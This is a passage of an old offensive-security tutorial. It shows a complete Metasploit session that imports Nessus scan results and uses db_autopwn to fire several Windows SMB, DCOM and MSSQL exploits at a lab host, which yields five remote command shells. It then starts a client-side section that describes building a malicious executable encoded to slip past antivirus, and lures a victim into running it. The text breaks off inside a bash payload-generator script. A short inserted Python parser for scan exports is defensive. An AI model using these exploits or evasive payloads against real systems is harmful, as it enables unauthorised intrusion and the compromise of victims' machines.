The Art of Grey-Box Attack (2)

Source: Internet
Author: User


[0x03b]-Nessus + Metasploit Autopwned
++

First, run a Nessus vulnerability assessment and export the results as a .nbe file, then import that file into the Metasploit Framework so db_autopwn can match exploits against the reported findings.

[Import Nessus (nbe) result to Metasploit] -------------------------------------------------------

bt framework3 # msfconsole

       =[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 56 aux

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/ness.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/ness.db
msf > db_import_nessus_nbe /root/demo.nbe
msf > db_hosts
[*] Time: Fri Jul 03 14:43:58 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -x -t
[*] Analysis completed in 4.28915095329285 seconds (17 vulns / 1145 refs)
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
[*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
msf > db_autopwn -x -e
[*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...

[*] Started bind handler
[*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Started bind handler
[*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
[*] Sending UDP packet with return address 0x42b48774
[*] Execute net start sqlserveragent once access is obtained
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Sending exploit...
msf >
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-4268-5a47bf6ee188:3.0@ncacn_np:192.168.80.129[\BROWSER] ...
[*] Started bind handler
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.80.129[\browser] ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:41655 -> 192.168.80.129:39354)
[*] Command shell session 2 opened (192.168.80.131:57118 -> 192.168.80.129:7605)
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.80.129[\lsarpc] ...
[*] Bound to 4b324fc8-1670-01d3-4268-5a47bf6ee188:3.0@ncacn_np:192.168.80.129[\BROWSER] ...
[*] Building the stub data...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.80.129[\browser] ...
[*] Calling the vulnerable function...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.80.129[\lsarpc] ...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 3 opened (192.168.80.131:50407 -> 192.168.80.129:15299)
[*] Command shell session 4 opened (192.168.80.131:32768 -> 192.168.80.129:30092)
[*] The DCERPC service did not reply to our request
[*] Command shell session 5 opened (192.168.80.131:39556 -> 192.168.80.129:17330)
sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.80.131:41655 -> 192.168.80.129:39354
  2   Command shell  192.168.80.131:57118 -> 192.168.80.129:7605
  3   Command shell  192.168.80.131:50407 -> 192.168.80.129:15299
  4   Command shell  192.168.80.131:32768 -> 192.168.80.129:30092
  5   Command shell  192.168.80.131:39556 -> 192.168.80.129:17330

msf > sessions -i 3
[*] Starting interaction with 3...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.80.129
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>

[End Result] Begin
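As an added example (not code from the original article), a small parser for the .nbe export that db_import_nessus_nbe consumes: it reads constructed sample records and lists, per host, the ports carrying Security Hole findings, which are the services a matcher like db_autopwn -t keys on and the first ones to patch or firewall. The results-record layout assumed here is results|subnet|host|service (port/proto)|plugin_id|severity|text.

```python
"""Parse Nessus NBE export records into a per-host finding summary."""
import re
from collections import defaultdict
# Constructed sample export (not from the page). Layout assumed for 'results'
# records: results|subnet|host|service (port/proto)|plugin_id|severity|text
SAMPLE_NBE = """\
timestamps|||scan_start|Fri Jul  3 14:40:01 2009|
results|192.168.80|192.168.80.129|epmap (135/tcp)|10736|Security Hole|DCE/RPC endpoint mapper reachable
results|192.168.80|192.168.80.129|microsoft-ds (445/tcp)|11890|Security Hole|SMB service vulnerable
results|192.168.80|192.168.80.129|ms-sql-m (1434/udp)|10674|Security Warning|SQL resolution service
results|192.168.80|192.168.80.129|netbios-ns (137/udp)|10150|Security Note|NetBIOS name disclosed
results|192.168.80|192.168.80.130|http (80/tcp)|10107|Security Note|Server banner
timestamps|||scan_end|Fri Jul  3 14:43:58 2009|
"""

SERVICE_RE = re.compile(r"\((\d+)/(tcp|udp)\)")
SEVERITY_RANK = {"Log Message": 0, "Security Note": 1, "Security Warning": 2, "Security Hole": 3}

def parse_nbe(text):
    """Return {host: [(port, proto, plugin_id, severity, desc), ...]}."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        fields = line.split("|")
        if len(fields) < 7 or fields[0] != "results":
            continue  # timestamps records and malformed lines are skipped
        host, service, plugin_id, severity = fields[2], fields[3], fields[4], fields[5]
        m = SERVICE_RE.search(service)
        if not m:
            continue  # entries like 'general/tcp' carry no port; ignored here
        port, proto = int(m.group(1)), m.group(2)
        desc = "|".join(fields[6:]).strip()  # free text may itself contain '|'
        hosts[host].append((port, proto, plugin_id, severity, desc))
    return dict(hosts)

def exposed_services(hosts, min_severity="Security Hole"):
    """Ports per host with findings at or above min_severity: the subset an
    autopwn-style matcher keys on, and the first thing to patch or firewall."""
    floor = SEVERITY_RANK[min_severity]
    out = {}
    for host, findings in hosts.items():
        ports = sorted({(p, pr) for p, pr, _, sev, _ in findings
                        if SEVERITY_RANK.get(sev, 0) >= floor})
        if ports:
            out[host] = ports
    return out

if __name__ == "__main__":
    for host, ports in exposed_services(parse_nbe(SAMPLE_NBE)).items():
        print(host, ", ".join(f"{p}/{pr}" for p, pr in ports))
```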

#############################################
[0x04]-Client-Side Attack with Metasploit
#############################################

++
[0x04a]-Metasploit Payload Generator
++

Metasploit Payload Generator is a tool that lets you create malicious code easily.
It is not a tool for exploiting a system: you use it to create a malicious payload and
save it to an .exe file, and then you need to lure a victim into executing that file on his/her machine.

There is a feature to encode your payload to get past most AV and IDS/IPS (13 encoding choices).
So we can use Metasploit Payload Generator from "Fast-Track". If you don't have "Fast-Track", you need
the Metasploit Framework and this script ;)

[Metascript] metadata

#!/bin/bash
echo "###########################################"
echo "#### 0-Days Exploits with MetaCompiler ####"
echo "###########################################"
echo ""
echo -n "Enter your Listener IP Address :"
read ip
echo -n "Enter your Listener Port :"
read port
echo ""
echo "-= MetaCompiler Payloads =-"
echo ""
echo "++"
echo "+ Meterpreter Re
